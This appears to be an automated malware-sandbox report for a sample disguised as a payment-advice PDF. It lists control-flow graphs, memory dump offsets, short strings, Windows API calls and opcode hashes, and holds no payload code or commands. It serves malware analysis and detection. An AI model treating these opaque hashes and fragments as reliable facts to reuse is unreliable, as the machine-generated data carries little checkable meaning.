                                                                                                                control_flow_graph 1579 154f00-154f22 1580 154f24-154f28 1579->1580 1581 154f38-154f43 1579->1581 1582 154f50-154f57 1580->1582 1583 154f2a-154f36 1580->1583 1584 154f49-154f4b 1581->1584 1585 154feb-155017 1581->1585 1586 154f77-154f80 1582->1586 1587 154f59-154f60 1582->1587 1583->1581 1583->1582 1588 154fe3-154fe8 1584->1588 1592 15501e-155076 1585->1592 1685 154f82 call 154ef0 1586->1685 1686 154f82 call 154f00 1586->1686 1587->1586 1589 154f62-154f6d 1587->1589 1591 154f73-154f75 1589->1591 1589->1592 1591->1588 1611 155085-155097 1592->1611 1612 155078-15507e 1592->1612 1593 154f88-154f8a 1594 154f92-154f9a 1593->1594 1595 154f8c-154f90 1593->1595 1599 154f9c-154fa1 1594->1599 1600 154fa9-154fab 1594->1600 1595->1594 1598 154fad-154fcc call 155968 1595->1598 1605 154fe1 1598->1605 1606 154fce-154fd7 1598->1606 1599->1600 1600->1588 1605->1588 1680 154fd9 call 159eb0 1606->1680 1681 154fd9 call 159f6d 1606->1681 1608 154fdf 1608->1588 1614 15509d-1550a1 1611->1614 1615 15512b-15512d 1611->1615 1612->1611 1616 1550b1-1550be 1614->1616 1617 1550a3-1550af 1614->1617 1682 15512f call 1552b8 1615->1682 1683 15512f call 1552c8 1615->1683 1625 1550c0-1550ca 1616->1625 1617->1625 1618 155135-15513b 1619 155147-15514e 1618->1619 1620 15513d-155143 1618->1620 1623 155145 1620->1623 1624 1551a9-155208 1620->1624 1623->1619 1638 15520f-155233 1624->1638 1628 1550f7-1550fb 1625->1628 1629 1550cc-1550db 1625->1629 1630 155107-15510b 1628->1630 1631 1550fd-155103 1628->1631 1640 1550dd-1550e4 1629->1640 1641 1550eb-1550f5 1629->1641 1630->1619 1635 15510d-155111 1630->1635 1633 155105 1631->1633 1634 155151-1551a2 1631->1634 1633->1619 1634->1624 1637 155117-155129 1635->1637 1635->1638 1637->1619 1648 155235-155237 1638->1648 1649 155239-15523b 1638->1649 1640->1641 1641->1628 1650 1552b1-1552b4 1648->1650 1651 15523d-155241 1649->1651 1652 15524c-15524e 1649->1652 1656 155247-15524a 1651->1656 1657 155243-155245 1651->1657 1658 155261-155267 1652->1658 1659 155250-155254 1652->1659 1656->1650 1657->1650 1663 155292-155294 1658->1663 1664 155269-155290 1658->1664 1660 155256-155258 1659->1660 1661 15525a-15525f 1659->1661 1660->1650 1661->1650 1668 15529b-15529d 1663->1668 1664->1668 1670 1552a3-1552a5 1668->1670 1671 15529f-1552a1 1668->1671 1672 1552a7-1552ac 1670->1672 1673 1552ae 1670->1673 1671->1650 1672->1650 1673->1650 1680->1608 1681->1608 1682->1618 1683->1618 1685->1593 1686->1593
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Hxq$Hxq
                                                                                                                • API String ID: 0-1947182729
                                                                                                                • Opcode ID: 972c66ca3cd9ed329a4057c47d9ec1545dd442116e68742c53fc27a5efe83ecc
                                                                                                                • Instruction ID: f3de94fb028f3fd0dc46ec7a65f1710219e90daeca98137b1726225c0f1d7ab9
                                                                                                                • Opcode Fuzzy Hash: 972c66ca3cd9ed329a4057c47d9ec1545dd442116e68742c53fc27a5efe83ecc
                                                                                                                • Instruction Fuzzy Hash: E6B1DF30304640CFCB299F39C8A4B6A7BA7AF88316F154529E816CF3A5CB74CD85DB91

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1687 155460-15546d 1688 155475-155477 1687->1688 1689 15546f-155473 1687->1689 1691 155688-15568f 1688->1691 1689->1688 1690 15547c-155487 1689->1690 1692 155690 1690->1692 1693 15548d-155494 1690->1693 1696 155695-1556cd 1692->1696 1694 155629-15562f 1693->1694 1695 15549a-1554a9 1693->1695 1698 155635-155639 1694->1698 1699 155631-155633 1694->1699 1695->1696 1697 1554af-1554be 1695->1697 1717 1556d6-1556da 1696->1717 1718 1556cf-1556d4 1696->1718 1705 1554c0-1554c3 1697->1705 1706 1554d3-1554d6 1697->1706 1700 155686 1698->1700 1701 15563b-155641 1698->1701 1699->1691 1700->1691 1701->1692 1703 155643-155646 1701->1703 1703->1692 1707 155648-15565d 1703->1707 1708 1554c5-1554c8 1705->1708 1709 1554e2-1554e8 1705->1709 1706->1709 1710 1554d8-1554db 1706->1710 1726 155681-155684 1707->1726 1727 15565f-155665 1707->1727 1712 1554ce 1708->1712 1713 1555c9-1555cf 1708->1713 1719 155500-15551d 1709->1719 1720 1554ea-1554f0 1709->1720 1714 1554dd 1710->1714 1715 15552e-155534 1710->1715 1723 1555f4-155601 1712->1723 1721 1555e7-1555f1 1713->1721 1722 1555d1-1555d7 1713->1722 1714->1723 1724 155536-15553c 1715->1724 1725 15554c-15555e 1715->1725 1728 1556e0-1556e2 1717->1728 1718->1728 1759 155526-155529 1719->1759 1729 1554f4-1554fe 1720->1729 1730 1554f2 1720->1730 1721->1723 1731 1555d9 1722->1731 1732 1555db-1555e5 1722->1732 1748 155615-155617 1723->1748 1749 155603-155607 1723->1749 1734 155540-15554a 1724->1734 1735 15553e 1724->1735 1751 155560-15556c 1725->1751 1752 15556e-155591 1725->1752 1726->1691 1736 155677-15567a 1727->1736 1737 155667-155675 1727->1737 1738 1556e4-1556f6 1728->1738 1739 1556f7-1556fe 1728->1739 1729->1719 1730->1719 1731->1721 1732->1721 1734->1725 1735->1725 1736->1692 1743 15567c-15567f 1736->1743 1737->1692 1737->1736 1743->1726 1743->1727 1755 15561b-15561e 1748->1755 1749->1748 1754 155609-15560d 1749->1754 1761 1555b9-1555c7 1751->1761 1752->1692 1763 155597-15559a 1752->1763 1754->1692 1760 155613 1754->1760 1755->1692 1756 155620-155623 1755->1756 1756->1694 1756->1695 1759->1723 1760->1755 1761->1723 1763->1692 1765 1555a0-1555b2 1763->1765 1765->1761
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,xq$,xq
                                                                                                                • API String ID: 0-689986317
                                                                                                                • Opcode ID: d579d5898eae44244f802229a4215bb3b1d745fbf65003d98edcff3a6760dfb0
                                                                                                                • Instruction ID: 60dfe8d893d4a3c9f4adc7bc3685fee3d9878fef067ed7ff44fcd455a6137c81
                                                                                                                • Opcode Fuzzy Hash: d579d5898eae44244f802229a4215bb3b1d745fbf65003d98edcff3a6760dfb0
                                                                                                                • Instruction Fuzzy Hash: B381B170B10945CFCB14CF69C4A49AAB7B3BF88316B658069E825DF365EB31EC45CB90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'tq$4'tq
                                                                                                                • API String ID: 0-2758119276
                                                                                                                • Opcode ID: 880e16acfef47dc2e4c5b06de252200916e0a7f2950e5268fc0cdaeea0249b48
                                                                                                                • Instruction ID: 80000c349986ee4c096db64bf1c99c2bf629ac47577bfd5e3b5d4c824e748d79
                                                                                                                • Opcode Fuzzy Hash: 880e16acfef47dc2e4c5b06de252200916e0a7f2950e5268fc0cdaeea0249b48
                                                                                                                • Instruction Fuzzy Hash: A5518270B04205DFDB14DBA9C8916BEB7B6EF88301F15846AE921EF295DF34CD498B90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Xxq$Xxq
                                                                                                                • API String ID: 0-3286106824
                                                                                                                • Opcode ID: b39a09886b4c2fbac2c9f6a314eefac820a1ccc3b36ded3451da86d417dd0942
                                                                                                                • Instruction ID: ce4d1dbb9dab039d6fb03c269520d60c4f26be44fd8dc3314299a301a3edee4c
                                                                                                                • Opcode Fuzzy Hash: b39a09886b4c2fbac2c9f6a314eefac820a1ccc3b36ded3451da86d417dd0942
                                                                                                                • Instruction Fuzzy Hash: F431F573B04225CBDF1C46BA989427EA6B6BBC6352F144039DC26DB391EFB4CC489691
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: $tq$$tq
                                                                                                                • API String ID: 0-1837209516
                                                                                                                • Opcode ID: 2215fe907b2ae521a8f16b961d722a1b6fba379bd6009a2e8e9c98645b67719b
                                                                                                                • Instruction ID: d8e4b3aa78a823f3dbe9c75a3e5dee915e4b4287cf3db22021c7b11c08f9483d
                                                                                                                • Opcode Fuzzy Hash: 2215fe907b2ae521a8f16b961d722a1b6fba379bd6009a2e8e9c98645b67719b
                                                                                                                • Instruction Fuzzy Hash: C9316470308151CFDB29CB79E85663DBB65AB85702B2504ABE836CF2D2DB24DC44C7A1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: <CO7$<CO7
                                                                                                                • API String ID: 0-287234914
                                                                                                                • Opcode ID: 62cf35bf8d9ec12eadfba7a17644a1e71aa85b77fe66e627058ca66c8aa3b819
                                                                                                                • Instruction ID: 6a2639f2ef0cf29036466e284b7af53e13c62f734c13dff0ac9943b453c8af59
                                                                                                                • Opcode Fuzzy Hash: 62cf35bf8d9ec12eadfba7a17644a1e71aa85b77fe66e627058ca66c8aa3b819
                                                                                                                • Instruction Fuzzy Hash: 2A21D2B0D01329EFDB04DFE5D4447EEBBB2AF89311F508429E815BB240DB75564ACB50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'tq$4'tq
                                                                                                                • API String ID: 0-2758119276
                                                                                                                • Opcode ID: deb2ebe4e2db234d7afa2b4aa6ce9c5367143d237eb57473f488baab4ef45939
                                                                                                                • Instruction ID: 266a3062016e179da172900e91471091132d3dd0b24a70d07d5bb36ec5c36b5b
                                                                                                                • Opcode Fuzzy Hash: deb2ebe4e2db234d7afa2b4aa6ce9c5367143d237eb57473f488baab4ef45939
                                                                                                                • Instruction Fuzzy Hash: ADF0C2353002146FDB095AEAAC5097BBADBEBCC3A1B048429FE09CB391DE71CC01C7A0
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37FB0222
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: e33d892fe30f8ea6a87c348f2bb575ae9a8b9d7d059717b833806af13eae60b0
                                                                                                                • Instruction ID: e3f26fd840b5fffe0ddaa90cdfe80465ca2f7adee773e78d57dfe5a3b0cb288a
                                                                                                                • Opcode Fuzzy Hash: e33d892fe30f8ea6a87c348f2bb575ae9a8b9d7d059717b833806af13eae60b0
                                                                                                                • Instruction Fuzzy Hash: B351B0B5D10349EFDF14CF9AC880ADEBBB5BF48310F24852AE818AB210D775A945CF91
                                                                                                                APIs
                                                                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 37FB0222
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 716092398-0
                                                                                                                • Opcode ID: d065d8434a53485448fc1ad30a75dd8fc60003c47d665bef652137348b6f1e1c
                                                                                                                • Instruction ID: 4d5bdf381bcc9929dc1f837d8084ceba5922f94a4470400ce20d1b57e429eb04
                                                                                                                • Opcode Fuzzy Hash: d065d8434a53485448fc1ad30a75dd8fc60003c47d665bef652137348b6f1e1c
                                                                                                                • Instruction Fuzzy Hash: F441A0B5D14349DFDF14CF9AC884ADEBBB5BF48310F24852AE818AB210D775A945CF90
                                                                                                                APIs
                                                                                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 37FB1E81
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CallProcWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 2714655100-0
                                                                                                                • Opcode ID: 023af9dd13b64f39c7e80fdb852c53e47f12ae20eadc51bd4985a198729281d3
                                                                                                                • Instruction ID: 226177bd35d6fd2b7c41874bde8d875056d616e1335a8eac46bce6347edae544
                                                                                                                • Opcode Fuzzy Hash: 023af9dd13b64f39c7e80fdb852c53e47f12ae20eadc51bd4985a198729281d3
                                                                                                                • Instruction Fuzzy Hash: 0C4147B9900349DFDB14CF9AC444A9ABBF5FF88320F28C859D519AB321C774A841CBA1
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37FB0C4F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 1ca43bb44e23732fd411ab7c7e60794b6b1a629ee276ab8cba2edf30390111e6
                                                                                                                • Instruction ID: c8e88c799b71aad5a87e2021add9e0f8844356112f3ef00d656075dbca36cba9
                                                                                                                • Opcode Fuzzy Hash: 1ca43bb44e23732fd411ab7c7e60794b6b1a629ee276ab8cba2edf30390111e6
                                                                                                                • Instruction Fuzzy Hash: F321E6B5900248AFDB10CF9AD984ADEBBF9FB48320F14841AE958A7310D374A940CFA5
                                                                                                                APIs
                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37FB0C4F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DuplicateHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 3793708945-0
                                                                                                                • Opcode ID: 68d8f68f526d0a0a8de5e1a2309f1783fbf09f9c033f0b3064aa4a1a0eedccac
                                                                                                                • Instruction ID: 85b60a82d6ca78c3f07afa6811f6d0fa4b355dd5cc83c7b97ded143e6c1cf40c
                                                                                                                • Opcode Fuzzy Hash: 68d8f68f526d0a0a8de5e1a2309f1783fbf09f9c033f0b3064aa4a1a0eedccac
                                                                                                                • Instruction Fuzzy Hash: 0F21C6B59002489FDB10CF9AD984ADEBBF5FB48320F14841AE958A7310D374A940CFA5
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 37FBD445
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: ce268e5acd8a6fb2ba037f0c7995b8884103f097748e562bcc4c71b533c6c570
                                                                                                                • Instruction ID: 29cdcc626d30ef1f4543de53299aea32405eadaa8b238601407e4b6b330b47e4
                                                                                                                • Opcode Fuzzy Hash: ce268e5acd8a6fb2ba037f0c7995b8884103f097748e562bcc4c71b533c6c570
                                                                                                                • Instruction Fuzzy Hash: 2111F5B5804249DFDB10DFAAC544BDEBFF8EB48324F248859D518A7200C779A540CFA6
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Timer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2870079774-0
                                                                                                                • Opcode ID: e3b5b6ed8cd1f5fbbccf189f48dc7f1a323d3efca1c89b27ae965419ed71351c
                                                                                                                • Instruction ID: 98d36a2f2585b31845613b8c467d280fe8a50a738625d11e121f1f3e9380a4be
                                                                                                                • Opcode Fuzzy Hash: e3b5b6ed8cd1f5fbbccf189f48dc7f1a323d3efca1c89b27ae965419ed71351c
                                                                                                                • Instruction Fuzzy Hash: 1D11F5B58006499FDB10CF9AD944BDEBFF8FB48320F148819D958A7610C375A584CFA1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DispatchMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 2061451462-0
                                                                                                                • Opcode ID: 11bbeb36d2d84cbc2e4807648363ffe8a65c12f9ffe7910b781dca97ff818a6b
                                                                                                                • Instruction ID: 5d153f8fafc1d87411c43f127462f65d0891a87991a82a0ca54c571e4e9f11d8
                                                                                                                • Opcode Fuzzy Hash: 11bbeb36d2d84cbc2e4807648363ffe8a65c12f9ffe7910b781dca97ff818a6b
                                                                                                                • Instruction Fuzzy Hash: 5F1122B5C00649CFCB14CF9AD944BCEBBF4EB48324F14891AD828A7240C378A540CFA5
                                                                                                                APIs
                                                                                                                • OleInitialize.OLE32(00000000), ref: 37FBD445
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Initialize
                                                                                                                • String ID:
                                                                                                                • API String ID: 2538663250-0
                                                                                                                • Opcode ID: b13164c7c220d1586a468646eb27789aea8d7658f51a6c429f9e890f37da6380
                                                                                                                • Instruction ID: 32d7b53b25202e779eaecce6c8e3c02f6a7dbd6800975d4ba878933f49eabc3d
                                                                                                                • Opcode Fuzzy Hash: b13164c7c220d1586a468646eb27789aea8d7658f51a6c429f9e890f37da6380
                                                                                                                • Instruction Fuzzy Hash: 931115B5904348CFDB20DF9AC544B9EBBF4EF48324F24885AD518B7200C775A944CFA6
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Timer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2870079774-0
                                                                                                                • Opcode ID: 59cddc24f7b3b72997ebe97cda4c9a8e07c6a3d8cf7e5fa7e1b1729451c56c45
                                                                                                                • Instruction ID: 56a5c97048b0dcfb8152dbd79a23f8ff9231961d0edcfd3a70a2261afde63d83
                                                                                                                • Opcode Fuzzy Hash: 59cddc24f7b3b72997ebe97cda4c9a8e07c6a3d8cf7e5fa7e1b1729451c56c45
                                                                                                                • Instruction Fuzzy Hash: C811D3B5800349DFDB20DF9AD945BDEBBF8EB48320F148819D958A7210C375A984CFA5
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023796667.0000000037FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 37FB0000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37fb0000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DispatchMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 2061451462-0
                                                                                                                • Opcode ID: 09c997cfde4daac87b0395dae30b40875d4f8cde2394a1e0ac841355f3b3e98f
                                                                                                                • Instruction ID: e86f053e5813a8ff794c6b3849fd7ad5e2c71d56408bac2af8e239b3e5e7ff8c
                                                                                                                • Opcode Fuzzy Hash: 09c997cfde4daac87b0395dae30b40875d4f8cde2394a1e0ac841355f3b3e98f
                                                                                                                • Instruction Fuzzy Hash: AB1100B5C10648CFCB20CF9AD944BCEFBF4EB48324F24891AD828A3200C378A540CFA5
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LRtq
                                                                                                                • API String ID: 0-4092542751
                                                                                                                • Opcode ID: e260f5559c3ac671ba09f9b5137bb8cc95a98bdf6336a481ed16e6d751f11af4
                                                                                                                • Instruction ID: 35e9f27f7b6102ae1eb3abd8200f8ad15641453bfdd24d144b312eb4247fb742
                                                                                                                • Opcode Fuzzy Hash: e260f5559c3ac671ba09f9b5137bb8cc95a98bdf6336a481ed16e6d751f11af4
                                                                                                                • Instruction Fuzzy Hash: 13A1DAB4A1028ACFCF05DFA9E98599DBBB1FB88305F105525E405AB365EB306D86CF80
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: LRtq
                                                                                                                • API String ID: 0-4092542751
                                                                                                                • Opcode ID: 8441ef6336b9d7c8b5c05c61900824f92534b1ac7346ea99b127269faf33175a
                                                                                                                • Instruction ID: d6672804394f2a808dd96050458ba2d42547a7a04ba8f6d077ea792f07577a5d
                                                                                                                • Opcode Fuzzy Hash: 8441ef6336b9d7c8b5c05c61900824f92534b1ac7346ea99b127269faf33175a
                                                                                                                • Instruction Fuzzy Hash: 26A1CAB4A1024ACFCF05DFA9E98599DBBB1FB88305F105525E405BB365EB306D86CF80
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: gO7
                                                                                                                • API String ID: 0-2845518358
                                                                                                                • Opcode ID: 4fb077ee5f3a1781421dfd1052611d69a0a468939497268e52c769d02a4c4b41
                                                                                                                • Instruction ID: 268c9af8be8bb7e4810b3ad1099638de87c97a83796dc56a4006b0e643917993
                                                                                                                • Opcode Fuzzy Hash: 4fb077ee5f3a1781421dfd1052611d69a0a468939497268e52c769d02a4c4b41
                                                                                                                • Instruction Fuzzy Hash: 1671F975A00219DFDF05DFB5C898A9DBBB2FF89701F108529D416AB350DB38A952CF41
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.2998512009.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_150000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (otq
                                                                                                                • API String ID: 0-1796745608
                                                                                                                • Opcode ID: e753c25da70a53457f3c8b1b1c8f6219d6f73873f06eb5c0dfb308720fccd91b
                                                                                                                • Instruction ID: ee860122410b9203ed6b66e20af4f8730e11d4c959561b8d56956e4d4e55ecc0
                                                                                                                • Opcode Fuzzy Hash: e753c25da70a53457f3c8b1b1c8f6219d6f73873f06eb5c0dfb308720fccd91b
                                                                                                                • Instruction Fuzzy Hash: 2D411231B04204CFCB14AF68D854AAEBBB2AFC8711F14416AE916DB3A1CF308D46CB91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: gO7
                                                                                                                • API String ID: 0-2845518358
                                                                                                                • Opcode ID: 0fe98aa6bb508a7779abf6966360d2915a0351581b73f10c8ee9b23f1f96f489
                                                                                                                • Instruction ID: 6aa0a3809fc199a0e7974f070d16a98d59df40011720a85bf60a1d445004c4b9
                                                                                                                • Opcode Fuzzy Hash: 0fe98aa6bb508a7779abf6966360d2915a0351581b73f10c8ee9b23f1f96f489
                                                                                                                • Instruction Fuzzy Hash: DC316F74A00305DBDB19DFB5C4946EE7BF6AB89251F10852AD816EB350DF38A842CF51
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.3023557681.0000000037A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A80000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_4_2_37a80000_PAYMENT ADVICE 750013-1012449943-81347-pdf.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: TkO7
                                                                                                                • API String ID: 0-4009072109
                                                                                                                • Opcode ID: 141a53029b7eedc5191c76e4fac4aaa38a9217cfc2682641d357ff8bc2a7cd6f
                                                                                                                • Instruction ID: 2b5674130c2a5f3e1fa5515043f00764305a6dd247278eede654ff928b0254df
                                                                                                                • Opcode Fuzzy Hash: 141a53029b7eedc5191c76e4fac4aaa38a9217cfc2682641d357ff8bc2a7cd6f
